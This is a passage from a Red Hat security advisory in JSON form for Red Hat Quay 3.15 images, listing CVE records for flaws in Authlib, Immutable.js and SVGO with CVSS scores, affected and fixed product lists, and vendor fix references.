"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "NONE",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "authlib: Authlib: Signature verification bypass via malicious JWT allows unauthorized access"
},
{
"cve": "CVE-2026-29063",
"cwe": {
"id": "CWE-915",
"name": "Improperly Controlled Modification of Dynamically-Determined Object Attributes"
},
"discovery_date": "2026-03-06T19:00:57.982727+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445291"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in Immutable.js, a library for persistent immutable data structures. This vulnerability, known as Prototype Pollution, allows an attacker with low privileges to inject unwanted properties into core JavaScript object prototypes without user interaction. By manipulating specific APIs such as mergeDeep(), mergeDeepWith(), merge(), Map.toJS(), and Map.toObject(), a remote attacker could potentially execute arbitrary code or cause a denial of service (DoS).",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "Exploitation of this vulnerability requires that an attacker is able to provide arbitrary data to clients of this library in a way that calls the affected functions with data the attacker controls. In most deployments, the ability to provide data in this fashion requires that an attacker has some degree of privileges to access the affected applications.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-29063"
},
{
"category": "external",
"summary": "RHBZ#2445291",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2445291"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-29063",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-29063"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29063"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v3.8.3"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v4.3.8"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5",
"url": "https://github.com/immutable-js/immutable-js/releases/tag/v5.1.5"
},
{
"category": "external",
"summary": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw",
"url": "https://github.com/immutable-js/immutable-js/security/advisories/GHSA-wf6x-7x77-mvgw"
}
],
"release_date": "2026-03-06T18:25:22.438000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-04-03T22:07:28+00:00",
"details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:6568"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Important"
}
],
"title": "immutable-js: Immutable.js: Arbitrary code execution via Prototype Pollution"
},
{
"cve": "CVE-2026-29074",
"cwe": {
"id": "CWE-776",
"name": "Improper Restriction of Recursive Entity References in DTDs (\u0027XML Entity Expansion\u0027)"
},
"discovery_date": "2026-03-06T00:00:00+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:a1d9c6f2f614dcea14f3b4564e69fe9ca894c9498fd08c5fdaa3616768ccedc3_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:d6ab62eec5e5489daa85fdda283e86c96101f7d576432d5a4b2865e4fdb0dbf1_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:7b129e1319cc2f0edb134149b2cfecc021ca552cfede24d74d4631c3019e233e_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:2970429dcb7f99abf0d0cef4fa59346c90f129ae46d6e746d128b13e55616e06_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:5c02fe25ab73d531f543a673997170b5079c59c93e6ea240e795bfe6520782e3_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-builder-rhel8@sha256:9d81c106c68fab8c44dcd4c14698be0b8c76862885483ae20c5aa83c8334c805_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:25b0676b9bb2e564fc64b43567ca4e3acda0a9d6ea405f2f8134b0e36b27b701_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:3681b3bb7257b54ea71d65370158e52d7165cc1038c129ea0266af21a773a022_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:cde4dc0f20b553550d6009ebc105e5cc80fbdd21d200f3d63f6c435f4addd804_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-container-security-operator-rhel8@sha256:ee7bf66cbb9116521d74e87d5a1b260bcce7634100aab7602149ad2c5bed4c72_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-bundle@sha256:dec2520d12b13cd73ebceb03a82daddfff4b06e57e993268ea52cd21c0136147_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:26a62adcd46e5f84dff66336ccf9392a5bb8369b042dd01c3528ade17c6efa55_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:8429e68dd8a1f4dc768304d17cd61beb772c0bcf5a4137d626b0a7333204d116_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-operator-rhel8@sha256:e5da14b11a892cc6cad89703d6415b95a47065fa2b1eb308c395579e9cce392a_ppc64le"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2445132"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in SVGO, an SVG (Scalable Vector Graphics) Optimizer. This vulnerability allows a remote attacker to cause a Denial of Service (DoS) by submitting a specially crafted XML file. The application\u0027s failure to properly guard against XML entity expansion or recursion can lead to the Node.js process consuming excessive memory and crashing.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "svgo: SVGO: Denial of Service via XML entity expansion",
"title": "Vulnerability summary"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:8acebb6bd51def60517b03f92103cecfadfc8e7fce42e4a002cb9c9271915b6b_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:be166b843cc21b3942850443c0f802406f397f71959654a45e17a24fdcb0606a_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-rhel8@sha256:c72dd9dd58db8ebcdc9b4daa433840411636e3dea82b21ca191fd0d272e636ec_amd64"
],
"known_not_affected": [
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:0a1c4f139b35d13aa4b3f6508919e25d3bbfdf588337704c1fc8cc7085bc2eb2_s390x",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:35047410a723f6e5b71137b7c6de497eed464dc1528419645cb308f2fd0696d6_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/clair-rhel8@sha256:76c0db9a4d4fcb45502d9d852f23a96aee91990217e19b519f7608eeb377eb22_ppc64le",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:ebdb8e8b383adc86e78fbed0937c27bead67d0b6cb897a93c1558fd265696a1b_amd64",
"Red Hat Quay 3.15:registry.redhat.io/quay/quay-bridge-operator-rhel8@sha256:88854cbe000c3d84ee1000f1d350332eb861a031ece1e1ce0a4f85bcd1eb584e_ppc64le",
